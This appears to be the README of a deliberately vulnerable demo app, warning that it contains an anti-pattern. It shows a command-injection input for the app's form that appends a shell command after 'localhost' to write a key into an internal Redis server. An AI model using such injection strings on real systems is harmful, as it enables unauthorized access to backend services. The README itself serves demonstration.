# sample-app

> This project contains anti-pattern. Do not use in production.

A sample app used for our demo.

Details on the required manual steps are documented [here](demo/README.md).

This is an example on how to use the form to inject code:
``` bash
localhost; echo SET key0 Value0 | redis-cli -h redis-master.redis -p 6379 --pipe
```

You can monitor the Redis Cluster with `redis-cli monitor`.

